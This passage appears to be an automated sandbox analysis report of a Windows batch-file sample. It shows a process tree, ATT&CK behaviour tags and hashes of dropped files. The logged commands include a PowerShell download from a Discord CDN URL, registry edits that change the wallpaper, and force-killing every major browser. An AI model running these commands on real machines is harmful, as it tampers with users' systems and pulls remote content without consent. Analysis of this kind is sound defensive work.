                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                  4⤵
                                                                                    PID:4308
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                                                                                  3⤵
                                                                                    PID:4212
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                      4⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5216
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                      4⤵
                                                                                      • Sets desktop wallpaper using registry
                                                                                      PID:6112
                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                      4⤵
                                                                                        PID:5392
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                                                                      3⤵
                                                                                        PID:4204
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5528
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                          4⤵
                                                                                          • Sets desktop wallpaper using registry
                                                                                          PID:1292
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                          4⤵
                                                                                            PID:1452
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "chrome.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4236
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "firefox.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3468
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "msedge.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1540
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "opera.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:6052
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "brave.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:6076
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "vivaldi.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5972
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 60 /nobreak
                                                                                          3⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:2608
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 60 /nobreak
                                                                                          3⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:924
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 60 /nobreak
                                                                                          3⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:4376
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                                                                                        2⤵
                                                                                        • Drops file in System32 directory
                                                                                        • Drops file in Program Files directory
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3160
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                          3⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2276
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                          3⤵
                                                                                          • Sets desktop wallpaper using registry
                                                                                          PID:2628
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                          3⤵
                                                                                            PID:3568
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
                                                                                            3⤵
                                                                                              PID:2964
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                4⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4480
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                4⤵
                                                                                                • Sets desktop wallpaper using registry
                                                                                                PID:5756
                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                4⤵
                                                                                                  PID:3176
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                                                                                                3⤵
                                                                                                  PID:4784
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                    4⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3972
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                    4⤵
                                                                                                    • Sets desktop wallpaper using registry
                                                                                                    PID:5732
                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                    4⤵
                                                                                                      PID:1084
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                                                                                                    3⤵
                                                                                                      PID:3276
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                        4⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4308
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                        4⤵
                                                                                                        • Sets desktop wallpaper using registry
                                                                                                        PID:2768
                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                        4⤵
                                                                                                          PID:5216
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                                                                                                        3⤵
                                                                                                          PID:2896
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                            4⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5332
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                            4⤵
                                                                                                            • Sets desktop wallpaper using registry
                                                                                                            PID:5024
                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                            4⤵
                                                                                                              PID:5584
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                                                                                                            3⤵
                                                                                                              PID:3652
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                                4⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:216
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                                4⤵
                                                                                                                • Sets desktop wallpaper using registry
                                                                                                                PID:2468
                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                4⤵
                                                                                                                  PID:1296
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                                                                                                3⤵
                                                                                                                  PID:4964
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                                    4⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4172
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                                    4⤵
                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                    PID:5484
                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                    4⤵
                                                                                                                      PID:6108
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "chrome.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4864
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "firefox.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5932
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "msedge.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3048
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "opera.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1824
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "brave.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5984
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "vivaldi.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5600
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:5532
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:2628
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:2240
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                                                                                                  2⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1120
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                                    3⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1408
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                                    3⤵
                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                    PID:4332
                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                    3⤵
                                                                                                                      PID:3340
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "chrome.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1832
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "firefox.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1128
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "msedge.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5312
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "opera.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5244
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "brave.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5300
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "vivaldi.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5084
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:5480
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:2232
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:224
                                                                                                                • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                  C:\Windows\System32\WaaSMedicAgent.exe 468fb3b5cd290625c2c6947823a2b62b Y2Ob2QVAwU6uSA9mBklELg.0.1.0.0.0
                                                                                                                  1⤵
                                                                                                                    PID:2276
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      2⤵
                                                                                                                        PID:6112

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

Downloads

• C:\BatchFile\trustedinstaller.bat
  Filesize: 3KB
  MD5: a342c02d8b85d351af8871776fc67dd7
  SHA1: 4b7c7e5697cee05354f0902a3c40d35c7c892a7d
  SHA256: 9802eda5439017e0b2fe42d53bbeac75176c52b4383e33d1a4cb445a00b16b8b
  SHA512: 7ae1f71e87dc52c2dd640c025ca623304e28717119c52107163d905e8f17d6a20de243e6a1cf8f75ab9e797224b47eae199a669e209998620625b20c099657d5

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 8a1aed0c5750d9c66af9fa520d7743d9
  SHA1: 899dd7d1a0f6e7ac51f33933ecef78c4f34b8a71
  SHA256: 2d58c85a122093565b3482f0a1b7eb8ff3a05335497f2c47559297804fcb6b9c
  SHA512: 655b12da069f1de058c6ca5f4830be21d271d48772046964a2c375786f6d243905b9746aaf1cc7741c0f496aece4c93701368ff2a44f5ecb9d74ed1e079c15e8

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: f844e18314690934a1c8554e734ed892
  SHA1: 2a6f91fb1a47342e4df91ff5e2bbe4044f70765f
  SHA256: 0d557b3425b5b9a7129233e45bd457eb3635f0905994c186c2f7416e46ac76e2
  SHA512: 0420bae6a9cf6ab28ca9dfeaf3409a0f7efad59318ac64179bb212aff7ea3681445c4099202c93a14ed39a9a36374c6da995d957ee538116174ec3c283a8f364

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 0579e409bfdb135b8b6b14ed1bd0841e
  SHA1: 82743b0f39b0c33bbd801380a62138bff9784a21
  SHA256: d0f94b28f61cf80e1c0d549e378899c4929326c647914031ce0b6feaf6c77daa
  SHA512: 54a5f1fe79da40be3d026c7764ef7ef76414cd79eea097a1ca7d0ae4a8139f6b57ba8277b526f2aa82cd067d372c2adaead31b86debaa6467b3ff8853d38697a

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: b27e5c80db93354c87ecdc687c7636a3
  SHA1: a4cefa26f72e4d2f4858cad5327d71ba7aa611fa
  SHA256: ced2921ac44edf073cf6fcac97086d25006990d806939040244c669fe2c35d10
  SHA512: dfc4c1c0a7a9158cee9fb4ce6751bc9752dc3537f876428c099a0b235c2a8db62ca5c968f236dcb28b2add90ab4e333e95e35128163910345d2047da7664fc25

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 8436d10cdef2ac992ebe24ab15c6e9b2
  SHA1: 620fedb33dec176f6731a982970d61efe41505a4
  SHA256: b87fa6fc8b57c9a9e791547284725233aa10d40c594a770ef1f0bc8478fa63af
  SHA512: cbd3951ae7355f09973ec1c954c410f7471e65de8324ec374c5b450583c59d9c1f6766b73d06b736bae4e9301fe2b61ffa0a139442bc47d33184aea28d078ff3

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: c0ceb9f5abfc1870f6c365016cb3e8fe
  SHA1: c5c87a5101058052a6da73903d75484d2c09654b
  SHA256: bd544cc2c4e4385bb794d8f78d3d3490f1a992c4457337c0deb41ad3701327dd
  SHA512: a73ab986de0ff9052330b9db3e5958a5436d8a9d0db58af604b0b326b016e4f869769eb3b5fb6b033d0b3d610d1fc464d0a1e9596beee75842b3e79bd8329bf9

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 835da9199c16f074714996f994c01b2b
  SHA1: b6beef9812d7ba33073ff7d2bc62f3b28cd12824
  SHA256: 02fa204426ea92f72d46393da9ef2ab00fcc9dd54c05ed432b59dc1b9ff66530
  SHA512: 374d1cfdf8912ccbb14b8eab29f8f1516b29130b1e31f61a5fc52cdbceee3f86027e1d92fef612e470f3cbfea5bc896958dc17d19b1c925440cf259cfcf594ef

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 664fac119dfd73ece2201b5d4711b7e3
  SHA1: aac65a8be17e20dbf4da1a5bc2523c746fdacda4
  SHA256: 185c07200cda6bc0631e50145b228d575f66b9a32d17c2eecba4292bdca6c559
  SHA512: 4cc3f02c46d6abef9bd0ca761fbe4bb59469e0837d53b5c5ed9171155aaec60a7bb38c5aaf82634660451c0d2e6292b598dcfd491e0f737ffaa9765657dbe5f1

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 4124e3ac43b4b5c0ec809ba8804e33f3
  SHA1: 2343fcdcd963497d245d6ecc6f5b7fdea0934f84
  SHA256: 2e7303ad18710e0b45d90f07aa593d3e3c5f96e01644460980279033c164c31f
  SHA512: 848cd3b1a56c9ddf5591b2d2cd08d08433d679cfaad3978df4e4496b4eca0415901553a8fcbdb0544845524168a577f44495050a5361545d1f690ef42ef6a484

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: f171748e77672a03b4fa4184b931a476
  SHA1: d84996c2650fc62bc4de44769e161760445bb52c
  SHA256: 511b1cb690916a55f503ae0be2d4fdcbc84a3f0125f513de48a13dd16d61749d
  SHA512: 96152cf2d2ab2f1f3fe00f827e24bdb1af02401869dec085791f66bd0ad216d4dc69fc9c9180da6196b2f1c230650c31d79f2004b5021d253c2b66ee91b57dd0

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 5add60706a6084f3d5e8abb9342e2a0d
  SHA1: d08cf5b182a00d416017007f8de450749e528d70
  SHA256: d6a4d49b0f81bf50090c1d073c77b28322f8842ae660c3027ee6cd6c324c9843
  SHA512: dac9a302d7f293e0762b27124d939f107aeeb9810697512468ef72e27888faf88d12ebfbad2f36795cfd35c751c4f91dbe697fba749e6efd2abb93ea67e7d109

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: d31551143dffa380585324a0ae887f98
  SHA1: d85c90b23fc8e294150e52531e4d1a4df2b9f5dc
  SHA256: 3e35b7df7011979bf24fdaf74d07931418327e9acf112cc63aa44696e19b26cc
  SHA512: 01e8fb94a28ef163a95154c0c84f9a5761857c340f19fb4409df0e3d54a3f0f4049a4fa7f79a23e8db6ff3dfa34f18efd7c9e290674cf813b5ac649b257cd529

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: f49846e1215a5d696ec24cd647d8ee0d
  SHA1: 5054bb39c38b5a18e5a6a5cdce15e0124e46f472
  SHA256: 478fbb6dc535c5c31f2ad1f530efadb1629696ecfb390d025f13a5cc5668f27e
  SHA512: 03356a6ef9cfed4eafc0b763df88f9690a682faf55bd5759ca154f28f84afca6e42bac52cf6af2657b5f2431f7993d03c35e510a7b8b9f7081b1f518f0e10f85

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: a2b24af1492f112d2e53cb7415fda39f
  SHA1: dbfcee57242a14b60997bd03379cc60198976d85
  SHA256: fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
  SHA512: 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: fa4971f5945b4813eea651bbfe23af7a
  SHA1: 08975abfed3cd58cc981e3a54419a3e592002f5b
  SHA256: 7d091b10767a34e4e55ee70d1a76b12ccf76385e85731c09022bd42eb2d29ea1
  SHA512: d4537fe7bd02514cfcddf2ca5514c79b16399770953c2965848a6809043b38413c326c36f3c1955a4aa49781f280bbdec6a5b6ec3c40222828d7230c8348b96a

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: c733b0977c7642d9c5a946c598ef08c5
  SHA1: 2d814dd91fa8b23740dfafa1941312b5c456ea85
  SHA256: baf59921f970535dd5d31277777bdf583a2b152975cae133d6ac4360cd409cdd
  SHA512: 791c0a274f3760cddcd22cb03f82d8dafc8404a9df71c71024b1dc5c43e68fa51738e7f67ea8918be8ac47b0618609ccd84d10143f7a569b77e13af0aaf228d0

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vil0apu3.j0y.ps1

                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

